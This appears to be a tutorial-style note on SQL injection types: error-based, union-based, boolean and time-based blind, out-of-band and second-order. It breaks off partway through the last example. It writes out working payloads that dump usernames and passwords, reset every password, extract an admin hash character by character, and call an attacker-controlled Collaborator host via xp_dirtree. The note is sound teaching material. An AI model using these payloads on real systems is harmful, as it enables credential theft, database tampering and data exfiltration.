SQL Injection
A SQL injection is an attack in which the attacker executes arbitrary SQL commands on an application’s database by supplying malicious input inserted into a SQL statement. This happens when the input used in SQL queries is incorrectly filtered or escaped and can lead to authentication bypass, sensitive data leaks, tampering of the database and RCE in some cases. In-Band (classic) SQL Injection Occurs when the attacker uses the same communication channel to both launch the attack and gather the result of the attack Retrieved data is presented directly in the web page Easier to exploit than other categories of SQLi Error-Based SQLi Error bases SQLi is an in-band SQLi technique that forces the database to generate an error, giving the attacker information upon which to refine their injection www.random.com/app.php?id=' #output #You have an error in your SQL syntax, check the manual that corresponds to your MySQL server version... Union-Based SQLi Is an in-band SQLi technique that leverages the UNION SQL operator to combine the results of two queries into a single result set Input: # retrieving data from another table http://www.random.com/app.php?id=’ UNION SELECT username, password FROM users; -- # update all passwords from a table with POST method http://www.random.com/app.php?new_password="password12345';--" query = UPDATE Users SET Password='password12345';-- WHERE Id = 2; --- The WHERE clause, which specifies the criteria of the rows that should be updated, is commented out in this query. The database would update all rows in the table, and change all of the passwords in the Users table to password12345. The attacker can now log in as anyone by using that password Inferential (Blind) SQL Injection SQLi vuln where there is no actual transfer of data via the webapp Just as dangerous as in-band SQLi Attacker be able to reconstruct the information by sending particular requests and observing the resulting behavior of the DB Server Takes longer to exploit than in-ban sql injection Boolean-based SQLi Uses boolean conditions to return a different result depending on whether the query returns a TRUE or FALSE result. www.random.com/app.php?id=1 select title from product where id=1 #Payload 1 (false) www.random.com/app.php?id=1 and 1=2 select title from product where id=1 and 1=2 #Payload 2 (true) www.random.com/app.php?id=1 and 1=1 select title from product where id=1 and 1=1 User table: Administrator / e3c3889ded99ej29dj9edjdje992 SUBSTRING(a,b,c): function that select a part of a string a: the string, b:the first posicion, c=how many chars #Payload1 www.random.com/app.php?id=1 and SUBSTRING((SELECT Password FROM Users WHERE Username ='Administrator'), 1, 1)='s' #Query select title from product where id=1 and SUBSTRING((SELECT Password FROM Users Where Username='Administrator'),1,1)='s' #result: nothing is returned because is false #Payload 2 www.random.com/app.php?id=1 and SUBSTRING((SELECT Password FROM Users Where Username='Administrator'),1,1)='e' #Query select title from product where id=1 and SUBSTRING((SELECT Password FROM Users WHERE Username='Administrator'),1,1)='e' #result: Returned true, the tile of product id 1 is returned bc "e" is the first character of the hashed pass Time-based Blind SQLi Relies in the database pausing for a specified amount of time, then returning the result, indicating a success SQL query execution Ex: if the first character of the administrator’s hashed pass is an “a”, wait 10 seconds. Out-of-band (OAST) SQLi Consists of triggering an out-of-band network connection to a system that you control Not common, uses variety os protocols (DNS,HTTP) '; exec master..xp_dirtree '//434934839493499.burpcollabolator.net/a'-- Second order SQLi Second order SQLi happens when applications user input gets stored in the database, then retrieved and used unsafely in a SQL query. For example consider an app that register an user by specifying username and password, and the user submit the following request: ...
